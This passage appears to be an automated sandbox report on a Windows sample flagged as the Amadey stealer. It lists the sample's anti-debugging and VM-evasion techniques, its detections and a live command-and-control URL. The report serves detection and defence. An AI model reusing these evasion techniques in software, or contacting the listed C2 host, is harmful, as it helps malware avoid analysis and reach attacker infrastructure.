Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102465 second address: 1102469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102699 second address: 110269D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110284B second address: 1102852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: F8F26F second address: F8F273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 110D93B second address: 110D95A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 110D95A second address: 110D95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 11069E7 second address: 1106A11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F2E044F25F6h 0x0000000f jmp 00007F2E044F2601h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 1106A11 second address: 1106A34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F2E050A57D5h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 110CAB7 second address: 110CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 110CE10 second address: 110CE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D2h 0x00000007 jmp 00007F2E050A57D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F2E050A57D6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 110CE5B second address: 110CE62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 110D23C second address: 110D242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 1111343 second address: 111134A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 11113BA second address: 11113C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 11113C5 second address: 11113E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 nop 0x00000007 jg 00007F2E044F25FBh 0x0000000d push 00000000h 0x0000000f cld 0x00000010 push 6A7CACACh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jg 00007F2E044F25F6h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 11113E9 second address: 11113FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 111153E second address: 111156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 4CC5C343h 0x0000000f mov edi, 481B19A5h 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D2B3Dh] 0x0000001c push 00000000h 0x0000001e mov esi, edx 0x00000020 push 00000003h 0x00000022 cmc 0x00000023 push A1F63EA8h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c pop esi 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 111156B second address: 111158B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 111158B second address: 11115B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 add dword ptr [esp], 1E09C158h 0x0000000d mov ecx, dword ptr [ebp+122D385Fh] 0x00000013 lea ebx, dword ptr [ebp+12456116h] 0x00000019 sub dword ptr [ebp+122D2748h], eax 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 11115B0 second address: 11115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 11115B7 second address: 11115BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903AE second address: 4C903F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2E050A57CEh 0x0000000f push eax 0x00000010 jmp 00007F2E050A57CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edi, si 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C904D1 second address: 4C9052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F2E044F2601h 0x00000012 pop eax 0x00000013 jmp 00007F2E044F25FEh 0x00000018 push 2DF305ABh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2E044F2603h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9052A second address: 4C9052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9052E second address: 4C90534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90534 second address: 4C905A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E050A57D2h 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 5B03ABABh 0x00000014 pushad 0x00000015 mov bh, ah 0x00000017 call 00007F2E050A57CFh 0x0000001c mov eax, 453B743Fh 0x00000021 pop esi 0x00000022 popad 0x00000023 mov eax, dword ptr fs:[00000000h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov dx, si 0x0000002f pushfd 0x00000030 jmp 00007F2E050A57D8h 0x00000035 or esi, 2809DC58h 0x0000003b jmp 00007F2E050A57CBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C905A6 second address: 4C905E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2E044F25FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2E044F25FEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C905E3 second address: 4C90619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B6C4h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F2E050A57CFh 0x00000012 sub esp, 1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2E050A57D5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90619 second address: 4C90660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2E044F25FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2E044F25FCh 0x00000019 sbb cl, 00000038h 0x0000001c jmp 00007F2E044F25FBh 0x00000021 popfd 0x00000022 push esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90660 second address: 4C90666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90666 second address: 4C9066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F4EB59 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10F74B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 111F662 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1188739 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F8EB59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 11374B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 115F662 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 11C8739 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CE0CCA rdtsc

0_2_04CE0CCA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 411	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1239	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1239	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8184	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8168	Thread sleep count: 1265 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8168	Thread sleep time: -2531265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8140	Thread sleep count: 411 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8140	Thread sleep time: -12330000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5868	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8180	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8180	Thread sleep time: -2479239s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8164	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8164	Thread sleep time: -2479239s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000006.00000002.2983995234.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000002.1789114447.00000000009C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axplong.exe, 00000006.00000002.2983995234.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1789428838.00000000010D7000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1818397635.0000000001117000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1818466611.0000000001117000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CE0CCA rdtsc

0_2_04CE0CCA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F5645B mov eax, dword ptr fs:[00000030h]		6_2_00F5645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F5A1C2 mov eax, dword ptr fs:[00000030h]		6_2_00F5A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00F3D312 cpuid

6_2_00F3D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00F3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_00F3CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.axplong.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1818369517.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1818290086.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1789336542.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1743323131.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2324424326.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1777396325.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1776904295.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.215.113.16/Jo89Ku7d/index.phpom	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpm	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php&	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpi	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpSSv	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpb	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpCHIz	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpMicR	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php_RE&R	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpinb	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpN	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpO	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncoded)	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpY	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phptem	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpL	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpIVE	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpE	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpDri	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpPC	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpw	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpxSu	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpD;.N	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php?	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpndows	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpa=C	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php1	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpSy	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phprs	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.phpm	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpom	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpi	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpSSv	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php&	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
